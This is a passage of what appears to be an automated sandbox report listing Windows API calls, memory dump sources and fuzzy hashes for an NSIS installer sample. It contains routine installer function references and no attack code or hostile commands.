                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                  • Instruction ID: a9374e22e98c4dc303b182c9b737662c14652e6601d1bee761dd9fa1fda1dddb
                                                  • Opcode Fuzzy Hash: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
                                                  • Instruction Fuzzy Hash: CF1104618047A129EB3206281C44BB77FD84F57760F19507BE9C6722C2C67C5C6687AD
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A400,0040A400,00000000,00000000,0040A400,0042A800,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                    • Part of subcall function 00405268: lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
                                                    • Part of subcall function 00405268: SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID:
                                                  • API String ID: 1941528284-0
                                                  • Opcode ID: e46fcd66ca0c03b620896b40c4a0e1f2dfe6120aced77b5f2cefcd60ba1a1a55
                                                  • Instruction ID: 0d7b692f0969cc6c48ecd1773d7bef120b43cce909374c5328822aabc6167b55
                                                  • Opcode Fuzzy Hash: e46fcd66ca0c03b620896b40c4a0e1f2dfe6120aced77b5f2cefcd60ba1a1a55
                                                  • Instruction Fuzzy Hash: 5041EA31904514BACF107FB5CC85DAF3675DF01368B21823BF422F11E2D67C8A518A6D
                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 00401D58
                                                  • GetClientRect.USER32(?,?), ref: 00401D9F
                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                  • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 6d361dd0a7bd119e4dcf8cd95c58e489de1fba3b0937df668af2218f6ab52cb8
                                                  • Instruction ID: 4e2990ac6a4ffc21ac5b981bdbb81ef568083f955646f0f466aa61fc58f6164b
                                                  • Opcode Fuzzy Hash: 6d361dd0a7bd119e4dcf8cd95c58e489de1fba3b0937df668af2218f6ab52cb8
                                                  • Instruction Fuzzy Hash: E5215172E00109AFDB05DF98DE44AEEBBB9FB48300F11413AF955F62A1CB789941CB58
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E02
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                  • CreateFontIndirectA.GDI32(0040B800), ref: 00401E84
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: ecc7f293e71b6e620ba012bcc34b05138f32b7cee601414cb4789f3f20b24dfb
                                                  • Instruction ID: 0be634766171be457783ff79a9756eb1f19897d62519dac9fb9e1121949108d1
                                                  • Opcode Fuzzy Hash: ecc7f293e71b6e620ba012bcc34b05138f32b7cee601414cb4789f3f20b24dfb
                                                  • Instruction Fuzzy Hash: E0015672505244AFE7016B70AE49B9A3FFCEB55305F148839F141BA2F3C7B405058BAD
                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
                                                  • Instruction ID: 4dd2caf9872ce2c472bdea934ff98caf8c51944457e5ccf01e556c8d58d08a81
                                                  • Opcode Fuzzy Hash: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
                                                  • Instruction Fuzzy Hash: DF216BB1944208BEEF06AFA4D98AAAD7FB5EF84304F10457EF501B61D1C7B88640DB18
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052A1
                                                    • Part of subcall function 00405268: lstrlenA.KERNEL32(00402DEC,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052B1
                                                    • Part of subcall function 00405268: lstrcatA.KERNEL32(00420510,00402DEC,00402DEC,00420510,00000000,00000000,00000000), ref: 004052C4
                                                    • Part of subcall function 00405268: SetWindowTextA.USER32(00420510,00420510), ref: 004052D6
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FC
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405316
                                                    • Part of subcall function 00405268: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405324
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: df5d644a59522aa61f3373e64faaf985ebd9509900b3279fcc19072475c480c0
                                                  • Instruction ID: 80b21b969d6ebc687a9b8df38f4f0a36329d2626e066ad813a30d40d344f2c23
                                                  • Opcode Fuzzy Hash: df5d644a59522aa61f3373e64faaf985ebd9509900b3279fcc19072475c480c0
                                                  • Instruction Fuzzy Hash: D7210B31900214ABCF117FA4CF8DA9D75B4AF05318F61413BF511B62D0C7FC8942961E
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                  • Instruction ID: 8b1a66862eed69ce562a1c013b09e470fd8cd67d05fd9df1f25174a21af08f5a
                                                  • Opcode Fuzzy Hash: cba0278263bc03600708203fc435bba4fcda38ed50437662e6a3aa3c8f338271
                                                  • Instruction Fuzzy Hash: 9E115832504109BBEF129F90DF09B9E7B6DEB54340F204036B945B61E0E7B59E15AA68
                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,?,0042B400), ref: 00405771
                                                  • GetLastError.KERNEL32 ref: 00405785
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040579A
                                                  • GetLastError.KERNEL32 ref: 004057A4
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID:
                                                  • API String ID: 3449924974-0
                                                  • Opcode ID: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                  • Instruction ID: d10382b71f01f386bba03ee380318ec3e3b09e45dfe00312e2f61c9024105f83
                                                  • Opcode Fuzzy Hash: b2e40bd14cc28a37ac1f323aea01ae50661d499ebe80bd917bbe6229fb226c26
                                                  • Instruction Fuzzy Hash: 82010471D10619EADF109FA4DA04BEFBBB8EF14314F00403AD945B6290E77896088FA9
                                                  APIs
                                                    • Part of subcall function 00406141: lstrcpynA.KERNEL32(?,?,00000400,00403456,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040614E
                                                    • Part of subcall function 00405B72: CharNextA.USER32(?,?,00422138,?,00405BDE,00422138,00422138,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405B80
                                                    • Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B85
                                                    • Part of subcall function 00405B72: CharNextA.USER32(00000000), ref: 00405B99
                                                  • lstrlenA.KERNEL32(00422138,00000000,00422138,00422138,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0,00000000), ref: 00405C1A
                                                  • GetFileAttributesA.KERNEL32(00422138,00422138,00422138,00422138,00422138,00422138,00000000,00422138,00422138,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 00405C2A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 8!B
                                                  • API String ID: 3248276644-3245627493
                                                  • Opcode ID: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
                                                  • Instruction ID: f44c27dbebaf7467ddcf3faaec1fa70c7ffebf3acca808db2791febee6a049cb
                                                  • Opcode Fuzzy Hash: f11ffb2f425415d306e3ff92d605dce437d15ba0656bf276e283064df69d2d98
                                                  • Instruction Fuzzy Hash: 04F02D3510CE5016DA22333A1C06AAF6654CE8332871D013BFC52752D2CB3CA4529D7D
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 0040520B
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 0040525C
                                                    • Part of subcall function 0040421B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040422D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
                                                  • Instruction ID: ea2b2a229446d05cd35f1ac4721927dc1f932898565a27d058a062da5ba1ec36
                                                  • Opcode Fuzzy Hash: af1a6eb119da9e6e0b56ac6574a67ba8a9aef1628151bf47205cde5aebdf2d5f
                                                  • Instruction Fuzzy Hash: 8E017131200608ABEF215F51ED84A5B3A6AFF84354F54447BFA00762E1C739AC529E5A
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405D1D
                                                  • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405D37
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: nsa
                                                  • API String ID: 1716503409-2209301699
                                                  • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction ID: d70fdf4684184e9e49a6c992afbb8c38346e2f0ad7ed1da82a4e26761949b0bc
                                                  • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                                                  • Instruction Fuzzy Hash: 7FF082363046047BDB119F55DC08B9B7B9CEF91750F10C03BFA489A180D6B099648B59
                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405809
                                                  • CloseHandle.KERNEL32(?), ref: 00405816
                                                  Strings
                                                  • Error launching installer, xrefs: 004057F3
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                  • Instruction ID: ab941a05c4999c1485253c76fd5e070cef9538b2f1a85a786da17f0f1360f2f3
                                                  • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                  • Instruction Fuzzy Hash: 6FE04FF06002097FEB00AF60EE49F7B77ACEB10704F808431BD00F2150D67898548A7C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6074d66966345a0511974f5537eaaf60afeeaa24ac05f9c22eec821414083a3c
                                                  • Instruction ID: d064f3aa3bd4e65581b7a02d8d7766993962991d4d56626c18abd3cfb9ccca21
                                                  • Opcode Fuzzy Hash: 6074d66966345a0511974f5537eaaf60afeeaa24ac05f9c22eec821414083a3c
                                                  • Instruction Fuzzy Hash: 18A12271E00229CBDF28CFA8C8946ADBBB1FF44305F15856ED456BB281C7786A86DF44
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c3edf1685a731033d4d486edf49746b27e37c98c567ee1d4a32c95863af533a7
                                                  • Instruction ID: 090b0d4ea1aa0bf32c33cfea42ca504b17bc5dd94af43198fda2cf7b81042a45
                                                  • Opcode Fuzzy Hash: c3edf1685a731033d4d486edf49746b27e37c98c567ee1d4a32c95863af533a7
                                                  • Instruction Fuzzy Hash: 0B911070D00229CBDF28CF98C8987ADBBB1FB44305F15816ED856BB281C7785A86DF44
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f165648cebe51b97b8fa21a057af4a98adee68f3e51c059ceaee69b9ffb5e66
                                                  • Instruction ID: 9fff5468755916abca62c5e968c05a7427fefad9d8c85ea6c4cb17611be317d2
                                                  • Opcode Fuzzy Hash: 6f165648cebe51b97b8fa21a057af4a98adee68f3e51c059ceaee69b9ffb5e66
                                                  • Instruction Fuzzy Hash: 50815471D04228CFDF24CFA8C8887ADBBB1FB45305F25816AD416BB281C7389A86DF55
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d67c6518609d5e00a62046a112786c6b5fbb9729b770c638d48e29420064bd6
                                                  • Instruction ID: ce274397434e12883866e7d5aca5d494dd0bd3f11d15aed25330077a73a38ecb
                                                  • Opcode Fuzzy Hash: 0d67c6518609d5e00a62046a112786c6b5fbb9729b770c638d48e29420064bd6
                                                  • Instruction Fuzzy Hash: 91816671D04228CBDF24CFA8C8447AEBBB1FB44305F25816AD456BB281C7785A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2ce1ceaa73ead359ac10e83597be1970d5d6bbca98428d55bd536cf2d4baa15
                                                  • Instruction ID: 712327b4ba360f9873406890bfa66a7551055db31e5b4cf32af7873ce0627a0f
                                                  • Opcode Fuzzy Hash: b2ce1ceaa73ead359ac10e83597be1970d5d6bbca98428d55bd536cf2d4baa15
                                                  • Instruction Fuzzy Hash: D9714271D00228CFDF24CFA8C894BADBBB1FB48305F15816AD816BB281C7385A96DF54
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40be080613c1b9c7abc76cf02da527289f47aa3f0911e0de5f4ec916e65458b0
                                                  • Instruction ID: c0b605097b164116130eca60b1ab140e50dfbcee6288daaa4b45a2748c60fc6f
                                                  • Opcode Fuzzy Hash: 40be080613c1b9c7abc76cf02da527289f47aa3f0911e0de5f4ec916e65458b0
                                                  • Instruction Fuzzy Hash: 01713271E00228CBDF28CFA8C894BADBBB1FB44305F15816ED416BB281C7785A96DF55
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
                                                  • Instruction ID: df23799fdaa3b0d09e183135811d5b6505fb0232db5b531e6c94311c9a263d3d
